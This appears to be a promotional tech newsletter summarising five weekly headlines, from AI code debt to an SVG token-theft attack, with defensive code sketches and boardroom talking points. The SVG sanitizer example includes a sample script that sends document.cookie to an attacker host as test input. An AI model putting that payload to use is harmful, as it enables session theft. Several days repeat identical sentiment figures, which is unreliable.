Weekly Zeitgeister #02: AI Code Debt Spikes as LLM Scrapers Trigger Backlash

Plus: Keystroke-lag detection flags identity laundering, SVG-based token theft spreads, and browsers become the next AI battleground — Powered by Zeitgeister

What is Weekly Zeitgeister?



Weekly Zeitgeister is a new series powered by Zeitgeister, a tool I built to track what’s actually moving in tech, rank top stories, and turn them into usable insight. Zeitgeister crawls real technical conversations from across the web (forums, blogs, etc.), surfaces the most relevant trends, and generates context, risks/opportunities, and stakeholder-ready talking points.

Each week, I pull one high-signal headline per day from Zeitgeister, attach a brief summary, and then share why it matters if you’re building or running software at scale.

Vol II. AI Code Debt, Open-Source Blowback, and the New Attack Surface

This Week at a Glance

Monday’s Headline: AI Code: A Shortcut to Faster Shipping or a Path to Programmer Dependency?

Tuesday’s Headline: AI’s Unpaid Debt: LLM Scrapers Exploit Open Source, Igniting Copyright Controversy

Wednesday’s Headline: Amazon Outsmarts North Korean Infiltrator with Keystroke Lag Detection—A Cybersecurity Cat-and-Mouse Game

Thursday’s Headline: Discord and Vercel Hit by Supply-Chain Attack: SVG Exploit Exposes Major Security Flaws

Friday’s Headline: Firefox’s AI Gamble: Optional Features or Just More Bloat?

Monday – AI Code: A Shortcut to Faster Shipping or a Path to Programmer Dependency?

Sentiment Analysis: 30% Positive | 45% Negative | 25% Neutral

What happened

New signal data (e.g., from code review platforms) suggests AI-generated code may produce roughly 1.7x as many bugs as human-written code (about 70% more), reigniting the “speed vs. quality” debate.

“Vibe coding” is getting normalized. Developers accept AI suggestions that seem to work without fully understanding them—shipping faster, but struggling later with debugging, edge cases, and architecture.

Why it matters

Hidden tech-debt acceleration: Faster shipping can be erased by higher defect rates, maintenance load, and reliability hits within months.

Skill and org degradation risk: Teams may build systems they can’t deeply explain; seniors get pulled into review/firefighting while juniors skip fundamentals.

Security/compliance exposure: AI can introduce subtle auth/data-handling flaws that pass basic tests but fail in production or audits.

Actionable Insights

Treat AI code as “high scrutiny” by default: Require provenance (what was AI-assisted), add mandatory senior review for critical paths, and strengthen tests/static analysis.

Track outcome metrics, not just velocity: Bug rate, change-failure rate, MTTR, incident volume, and security findings, reported alongside throughput.

Set clear usage boundaries: Encourage AI for boilerplate/tests/refactors; restrict security-critical, performance-sensitive, and complex business logic unless explicitly reviewed.
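To make the outcome-metrics point concrete, here is a minimal sketch of computing change-failure rate and MTTR split by AI provenance. The `Deployment` record shape, the `ai_assisted` flag, and the sample data are all assumptions made for illustration; a real setup would pull these fields from your deploy and incident tooling.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class Deployment:
    """One production deployment. The record shape is hypothetical."""
    deployed_at: datetime
    ai_assisted: bool                       # provenance flag recorded at review time
    failed_at: Optional[datetime] = None    # when the change caused an incident, if it did
    restored_at: Optional[datetime] = None  # when service was restored


def change_failure_rate(deploys: list) -> float:
    """Fraction of deployments that led to a production failure."""
    if not deploys:
        return 0.0
    failed = sum(1 for d in deploys if d.failed_at is not None)
    return failed / len(deploys)


def mean_time_to_restore(deploys: list) -> Optional[timedelta]:
    """Average failure-to-restore duration, or None if nothing was restored."""
    durations = [
        d.restored_at - d.failed_at
        for d in deploys
        if d.failed_at is not None and d.restored_at is not None
    ]
    if not durations:
        return None
    return sum(durations, timedelta()) / len(durations)


# Made-up sample data, for illustration only.
t0 = datetime(2025, 1, 6, 9, 0)
deploys = [
    Deployment(t0, ai_assisted=True,
               failed_at=t0 + timedelta(hours=1),
               restored_at=t0 + timedelta(hours=3)),
    Deployment(t0 + timedelta(days=1), ai_assisted=True),
    Deployment(t0 + timedelta(days=2), ai_assisted=False),
    Deployment(t0 + timedelta(days=3), ai_assisted=False),
]

for label, flag in (("AI-assisted", True), ("not AI-assisted", False)):
    cohort = [d for d in deploys if d.ai_assisted is flag]
    print(label, change_failure_rate(cohort), mean_time_to_restore(cohort))
```

Splitting by provenance is the design choice that matters here: without the flag, a rise in defects cannot be attributed to AI-assisted changes or ruled out.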

Boardroom Talking Point

“AI coding can speed delivery, but early signals suggest ~70% higher bug rates and compounding tech debt. The advantage won’t come from adoption—it’ll come from governance: tighter reviews, stronger testing, and architectural guardrails so speed gains don’t turn into defects.”

Tuesday – AI’s Unpaid Debt: LLM Scrapers Exploit Open Source, Igniting Copyright Controversy

Sentiment Analysis: 45% Positive | 25% Negative | 30% Neutral

What happened

LLM scrapers are harvesting open-source repos to feed model training at scale, often without attribution or compensation.

Open-source licensing is colliding with AI training as contributors argue the “social contract” is being broken, especially under GPL-style expectations.

Pressure is building for enforcement or new license terms that restrict scraping/training or demand clearer compliance.

Why it matters

Training-data provenance is now a compliance risk for teams building or buying AI features.

Open-source supply may tighten if maintainers relicense, lock down access, or reduce contributions—directly impacting your dependency stack.

Vendor exposure moves upstream because a model provider’s data practices can become your legal/reputational problem.

Actionable Insights

Audit your AI supply chain by documenting what models/datasets you use and what licensing obligations attach.

Set an “OSS + AI” policy covering attribution expectations, allowed licenses, and scraping rules for internal teams and vendors.

Plan for license churn by tracking critical dependencies, monitoring relicensing moves, and lining up alternatives.
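As a rough sketch of what an “OSS + AI” audit could look like in practice, the snippet below checks an inventory of libraries, models, and datasets against a license allowlist. The allowlist, the `Component` shape, and every component name are hypothetical; the license strings are SPDX identifiers, and which ones you allow is a policy decision, not something this code decides for you.

```python
from dataclasses import dataclass

# Hypothetical policy: SPDX identifiers the organisation has approved.
ALLOWED_LICENSES = {"MIT", "Apache-2.0", "BSD-3-Clause"}


@dataclass(frozen=True)
class Component:
    name: str
    kind: str      # "library", "model", or "dataset"
    license: str   # SPDX identifier, or "UNKNOWN" if provenance is undocumented


def audit(components, allowed=ALLOWED_LICENSES):
    """Return (component, reason) pairs for anything that needs review."""
    findings = []
    for c in components:
        if c.license == "UNKNOWN":
            findings.append((c, "undocumented license or provenance"))
        elif c.license not in allowed:
            findings.append((c, f"license {c.license} is not on the allowlist"))
    return findings


# Made-up inventory, for illustration only.
inventory = [
    Component("http-client-lib", "library", "MIT"),
    Component("parser-lib", "library", "GPL-3.0-only"),
    Component("vendor-code-model", "model", "UNKNOWN"),
    Component("internal-docs-corpus", "dataset", "Apache-2.0"),
]

for component, reason in audit(inventory):
    print(f"{component.kind} {component.name}: {reason}")
```

Treating “UNKNOWN” as a finding rather than a pass is deliberate: for models and datasets, missing provenance is the risk the section describes.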

Boardroom Talking Point

“LLM scrapers are turning open source into contested training data—we need clear provenance and licensing guardrails for AI use, plus vendor assurances, before this becomes an audit or reputational event.”

Wednesday – Amazon Outsmarts North Korean Infiltrator with Keystroke Lag Detection—A Cybersecurity Cat-and-Mouse Game

Sentiment Analysis: 15% Positive | 65% Negative | 20% Neutral

What happened

Amazon used keystroke-lag analysis to detect an infiltrator: a consistent ~110ms delay suggested the “employee” was typing through remote access infrastructure, not locally.

The operation used identity laundering (stolen/fabricated Western identities + layered remote tooling) to place a worker inside a major tech org.

The big takeaway is the vector shift: this isn’t just “hacking” systems—the hiring pipeline is the entry point.

Why it matters

Remote hiring is now an attack surface: traditional background checks don’t reliably catch state-sponsored identity fraud.

High-impact access risk: once inside, a bad actor can exfiltrate IP, tamper with systems, or seed backdoors—and it can look like normal employee activity.

Legal + compliance exposure: employing sanctioned/foreign operatives (even unknowingly) can trigger regulatory, contractual, and reputational fallout.

Actionable Insights

Harden identity + onboarding: add stronger verification (liveness checks, independent reference validation, stepped-up checks for elevated roles).

Instrument remote-access telemetry: look for consistent latency signatures, unusual VPN/proxy chains, and geo/timezone mismatches tied to privileged accounts.

Expand insider-threat controls: treat contractors/vendors with production access as first-class risk—least privilege, tighter reviews, and faster offboarding/rotation.
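For the telemetry point, here is a minimal sketch of flagging a “consistent latency signature.” It is not Amazon's method, which the reporting does not detail. It assumes you already collect per-keystroke delay samples in milliseconds for a session, and the thresholds are illustrative guesses that would need tuning against your own baseline.

```python
from statistics import median, pstdev


def has_consistent_lag(delays_ms, min_median_ms=80.0, max_spread_ms=15.0,
                       min_samples=20):
    """Flag sessions whose keystroke delay is both high and unusually steady.

    A high but noisy delay looks like an ordinary bad connection; a high
    delay with very little spread looks more like a fixed relay hop.
    All thresholds here are assumptions, not published values.
    """
    if len(delays_ms) < min_samples:
        return False  # not enough data to say anything
    return (median(delays_ms) >= min_median_ms
            and pstdev(delays_ms) <= max_spread_ms)


# Made-up samples, for illustration only.
local_session = [8, 12, 10, 9, 11] * 5            # low delay
relayed_session = [108, 112, 110, 109, 111] * 5   # steady ~110ms offset
flaky_wifi = [20, 300, 15, 250, 10] * 5           # noisy, low median

for name, samples in (("local", local_session),
                      ("relayed", relayed_session),
                      ("flaky", flaky_wifi)):
    print(name, has_consistent_lag(samples))
```

A flag like this is a prompt for review, not proof. It works best combined with the other signals listed above, such as VPN/proxy chains and geo/timezone mismatches.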

Boardroom Talking Point

“Remote hiring is now a security perimeter. If Amazon caught this only via behavioral signals like keystroke lag, we should assume identity-laundering attempts won’t be stopped by background checks alone, so we need stronger verification and monitoring for any role with sensitive access.”

Thursday – Discord and Vercel Hit by Supply-Chain Attack: SVG Exploit Exposes Major Security Flaws

Sentiment Analysis: 45% Positive | 25% Negative | 30% Neutral

What happened

A supply-chain attack surfaced across major platforms (including Discord and Vercel), using malicious SVGs to inject code and steal session cookies / OAuth tokens.

With tokens in hand, attackers can bypass normal login flows and gain unauthorized access—turning a “harmless” file type into an account-compromise path.

The incident underscores how one weak dependency can cascade across multiple products and vendors fast.

Why it matters

Session + OAuth exposure: Token theft can become real account takeover, including privileged/internal access.

Dependency blast radius: Modern stacks (PaaS + open-source + third parties) mean a single compromised component can ripple widely.

Trust + compliance risk: Expect reputational damage, customer churn, and potential regulatory scrutiny—not just a technical cleanup.

Actionable Insights

Lock down token hygiene: Shorten TTLs, rotate secrets, enforce MFA, and monitor suspicious OAuth grants/session behavior.

Harden file handling: Treat SVG as executable-adjacent—sanitize/strip scripts, isolate rendering, and tighten CSP where possible.

Upgrade supply-chain controls: Maintain an SBOM/dependency inventory, require signing/verification where feasible, and run continuous audits + rapid patching.
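To illustrate “treat SVG as executable-adjacent,” here is a minimal sanitizer sketch using only Python's standard library. It strips script-capable elements, `on*` event handlers, and `javascript:` links. The blocklist is an assumption and is not exhaustive, and this is not how the affected platforms handle SVGs. For untrusted input in production, a hardened parser (for example the `defusedxml` package) and a maintained sanitizer are safer choices, ideally alongside isolated rendering and CSP.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ET.register_namespace("", SVG_NS)  # keep output free of ns0: prefixes

# Illustrative blocklist (lowercased local names); not exhaustive.
BLOCKED_TAGS = {"script", "foreignobject", "iframe", "object", "embed"}


def local_name(qualified: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1]


def sanitize_svg(svg_text: str) -> str:
    """Remove script-capable elements and attributes from an SVG document."""
    root = ET.fromstring(svg_text)
    for element in list(root.iter()):
        # Remove blocked child elements, including their whole subtree.
        for child in list(element):
            if local_name(child.tag).lower() in BLOCKED_TAGS:
                element.remove(child)
        # Remove event handlers and javascript: links (href or xlink:href).
        for attr in list(element.attrib):
            name = local_name(attr).lower()
            value = element.attrib[attr].strip().lower()
            if name.startswith("on") or (
                name == "href" and value.startswith("javascript:")
            ):
                del element.attrib[attr]
    return ET.tostring(root, encoding="unicode")


# Made-up malicious input, for illustration only.
dirty = (
    '<svg xmlns="http://www.w3.org/2000/svg" onload="steal()">'
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<a href="javascript:alert(1)"><circle r="5" onclick="x()"/></a>'
    "</svg>"
)
print(sanitize_svg(dirty))
```

A blocklist like this is the weaker approach. An allowlist of known-safe elements and attributes, or serving user SVGs from a separate cookieless origin, gives stronger guarantees.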

Boardroom Talking Point

“This attack shows how a single third-party weakness can become token theft and account takeover at scale—our dependency chain is an attack surface, and we need stronger vetting, token controls, and faster detection/response.”

Friday – Firefox’s AI Gamble: Optional Features or Just More Bloat?

Sentiment Analysis: 45% Positive | 25% Negative | 30% Neutral

What happened

Mozilla is moving to add AI capabilities to Firefox (smarter search, recommendations, web interactions), but with a global toggle to disable AI entirely.

The reaction splits along a familiar line: “useful upgrades” vs “privacy/bloat”—and alternatives like LibreWolf get pulled into the conversation as the “no-AI / privacy-first” lane.

Why it matters

User trust & retention: Optional AI can boost engagement, but any perception of “AI creep” or unclear defaults can push users to privacy-focused browsers fast.

Browser = AI distribution: Whoever controls the browser layer increasingly controls how AI shows up in daily workflows (search, assistants, default surfaces, partnerships).

Privacy + governance surface area: AI features can expand data handling, telemetry, and security risk, creating new expectations for transparency and enterprise controls.

Actionable Insights

Make “off” real: Ship AI as truly optional—clear settings, explicit disclosure, and no silent background AI calls when disabled.

Measure impact, not hype: Track adoption, retention, and churn by cohort (AI-on vs AI-off) and iterate defaults based on behavior + feedback.

Get ahead of trust concerns: Publish a plain-language privacy model (what data is used, where it’s processed, what’s stored) and offer admin/policy controls for orgs.
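One way to make “off” real is to route every AI call through a single gate that checks the user's setting before anything leaves the machine. The sketch below is a generic illustration, not Firefox's implementation; `AISettings`, `AIGateway`, and the `transport` callable are hypothetical names, and the off-by-default value is an assumption.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class AISettings:
    enabled: bool = False  # off by default; an assumption for this sketch


@dataclass
class AIGateway:
    """Single choke point for anything that would reach an AI backend."""
    settings: AISettings
    transport: Callable[[str], str]  # the only code path allowed to call the backend
    calls_made: int = 0

    def summarize(self, page_text: str) -> Optional[str]:
        if not self.settings.enabled:
            # Disabled means nothing is sent, queued, or prefetched.
            return None
        self.calls_made += 1
        return self.transport(page_text)


# Fake backend that records what it receives, for illustration only.
sent = []


def fake_transport(text: str) -> str:
    sent.append(text)
    return f"summary of {len(text)} characters"


gateway = AIGateway(AISettings(enabled=False), fake_transport)
print(gateway.summarize("some page text"), sent)   # disabled: no call recorded

gateway.settings.enabled = True
print(gateway.summarize("some page text"), sent)   # enabled: one call recorded
```

Keeping the check in one place makes the guarantee testable: a test can assert that the transport is never invoked while the toggle is off.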

Boardroom Talking Point

“Browsers are becoming the front door for AI. Firefox is betting on optional AI to grow engagement without breaking trust—but defaults, transparency, and enterprise controls will decide whether this drives adoption or churn to privacy-first alternatives.”

There you have it: five days, five headlines—each with a breakdown of what happened, why it matters for tech leaders, what to do next, and what to say to show stakeholders you’re aware and prepared for the future.

Back with another Weekly Zeitgeister next week.

Enjoy your weekend!

If you’d rather see trends personalized to you (mapped, explained, and ranked to your domains, your vendors, and your board conversations), try Zeitgeister.

It’s free, and you’ll get:

🧠 Agnostic trend feed across Reddit, HN, news, and more

📊 Synthesized briefings with context, risks, and opportunities

🗣️ Stakeholder-ready talking points for CEOs, boards, and PE partners

⏱️ A couple of hours saved each week on “what’s going on and why do I care?”

Brilliant breakdown, especially the Monday piece on AI code debt. The 1.7x bug rate is wild but honestly checks out from what I've seen on my team. We shipped faster initially but spent way more time later untangling edge cases that got glossed over. The real kicker is tracking outcome metrics instead of just velocity; that's where most orgs miss the plot entirely.

Zeitgeist is awesome. I like how the content is structured, specifically the boardroom talking points. They help unpack the issue and its impact without engineering jargon.

Looking forward to next week's Zeitgeist.